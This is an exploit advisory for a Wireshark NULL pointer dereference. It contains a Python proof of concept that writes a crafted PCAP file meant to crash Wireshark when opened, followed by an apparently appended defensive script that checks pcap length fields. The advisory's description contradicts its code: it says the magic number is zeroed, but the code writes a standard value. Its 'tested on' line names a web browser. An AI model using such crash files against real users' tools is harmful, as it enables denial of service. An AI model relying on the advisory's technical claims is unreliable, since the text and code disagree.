=============================================================================================================================================
| # Title : Wireshark NULL Pointer Dereference via Malicious PCAP |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214684/ & CVE-2025-9817

[+] Summary :

Wireshark is a widely used network traffic analysis tool that relies on protocol dissectors to parse packet data. This report documents a NULL Pointer Dereference vulnerability pattern that can be triggered by opening a specially crafted PCAP file.

The provided Proof of Concept (PoC) is written in Python and demonstrates how malformed packet fields may cause Wireshark to crash if a vulnerable dissector incorrectly interprets packet data as valid memory references.

This issue results in a Denial of Service (DoS) condition only. No code execution is demonstrated.

A packet field (magic_number) is set to 0x00000000 and later interpreted as a pointer without proper validation.
[+] PoC :

python3 poc.py crash.pcap

#!/usr/bin/env python3
import struct
import sys


def create_malicious_pcap(filename):
    with open(filename, 'wb') as f:
        # pcap global header: magic, version 2.4, thiszone, sigfigs,
        # snaplen 65535, linktype 1 (Ethernet); '@' uses the host's byte order
        f.write(struct.pack('@IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1))

        ts_sec = 1000
        ts_usec = 0
        eth_dst = b'\xff\xff\xff\xff\xff\xff'
        eth_src = b'\x00\x11\x22\x33\x44\x55'
        eth_type = b'\x08\x00'  # IPv4

        # IPv4 header: IHL 5, total length 0x003c (60), TTL 64, protocol 0x99,
        # checksum 0, 192.168.1.1 -> 192.168.1.255
        ip_header = bytes([
            0x45, 0x00, 0x00, 0x3c, 0x12, 0x34, 0x40, 0x00, 0x40, 0x99,
            0x00, 0x00, 0xc0, 0xa8, 0x01, 0x01, 0xc0, 0xa8, 0x01, 0xff
        ])

        # 9-byte payload following the IP header
        malicious_payload = bytes([
            0x01, 0xFF, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00
        ])

        incl_len = len(eth_dst) + len(eth_src) + len(eth_type) + \
            len(ip_header) + len(malicious_payload)

        # pcap record header: ts_sec, ts_usec, incl_len, orig_len
        f.write(struct.pack('@IIII', ts_sec, ts_usec, incl_len, incl_len))
        f.write(eth_dst)
        f.write(eth_src)
        f.write(eth_type)
        f.write(ip_header)
        f.write(malicious_payload)

    print(f"Created: {filename}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <output.pcap>")
        sys.exit(1)
    create_malicious_pcap(sys.argv[1])

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
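A defender-side check for the PoC above, added here as an example and not part of the original advisory or of Wireshark: it walks a pcap file record by record and reports where the length fields (snaplen, incl_len/orig_len, IPv4 IHL and total length) disagree with the bytes actually captured, the kind of inconsistency that a dissector trusting those fields mishandles. The sample pcap is constructed inline with the same frame layout the PoC writes.

```python
import struct

# Constructed sample, not the advisory's file: one Ethernet/IPv4 record whose
# IPv4 total length field (60) exceeds the 29 IP bytes actually captured,
# the same frame layout the PoC emits.
IP_HDR = bytes([0x45, 0x00, 0x00, 0x3c, 0x12, 0x34, 0x40, 0x00, 0x40, 0x99,
                0x00, 0x00, 0xc0, 0xa8, 0x01, 0x01, 0xc0, 0xa8, 0x01, 0xff])
PAYLOAD = bytes([0x01, 0xFF, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00])
FRAME = b'\xff' * 6 + b'\x00\x11\x22\x33\x44\x55' + b'\x08\x00' + IP_HDR + PAYLOAD
SAMPLE_PCAP = (struct.pack('<IHHiIII', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)
               + struct.pack('<IIII', 1000, 0, len(FRAME), len(FRAME)) + FRAME)


def check_pcap(data: bytes) -> list:
    """Return (record_index, message) findings for records whose length fields
    disagree with the bytes present; an empty list means nothing was flagged."""
    findings = []
    if len(data) < 24:
        return [(-1, "file shorter than the 24-byte global header")]
    magic = data[:4]
    if magic == b'\xd4\xc3\xb2\xa1':
        e = '<'  # written by a little-endian host
    elif magic == b'\xa1\xb2\xc3\xd4':
        e = '>'  # written by a big-endian host
    else:
        return [(-1, f"unrecognised magic {magic.hex()}")]
    snaplen, linktype = struct.unpack(e + 'IHHiIII', data[:24])[5:]
    off, idx = 24, 0
    while off + 16 <= len(data):
        _, _, incl_len, orig_len = struct.unpack(e + 'IIII', data[off:off + 16])
        frame = data[off + 16:off + 16 + incl_len]
        if incl_len > snaplen:
            findings.append((idx, f"incl_len {incl_len} exceeds snaplen {snaplen}"))
        if incl_len != orig_len:
            findings.append((idx, f"incl_len {incl_len} != orig_len {orig_len}"))
        if len(frame) < incl_len:
            findings.append((idx, f"record truncated: {len(frame)} of {incl_len} bytes"))
            break
        # Ethernet (linktype 1) carrying IPv4: the IP length fields must fit in the captured bytes
        if linktype == 1 and len(frame) >= 34 and frame[12:14] == b'\x08\x00':
            avail = len(frame) - 14
            ihl = (frame[14] & 0x0F) * 4
            total_len = struct.unpack('>H', frame[16:18])[0]
            if ihl < 20 or ihl > avail:
                findings.append((idx, f"bad IHL {ihl} for {avail} IP bytes"))
            if total_len > avail:
                findings.append((idx, f"IPv4 total length {total_len} exceeds {avail} captured IP bytes"))
        off += 16 + incl_len
        idx += 1
    return findings
```

Run it over a file with `check_pcap(open(path, 'rb').read())` before handing the capture to a dissector; any non-empty result is worth a look.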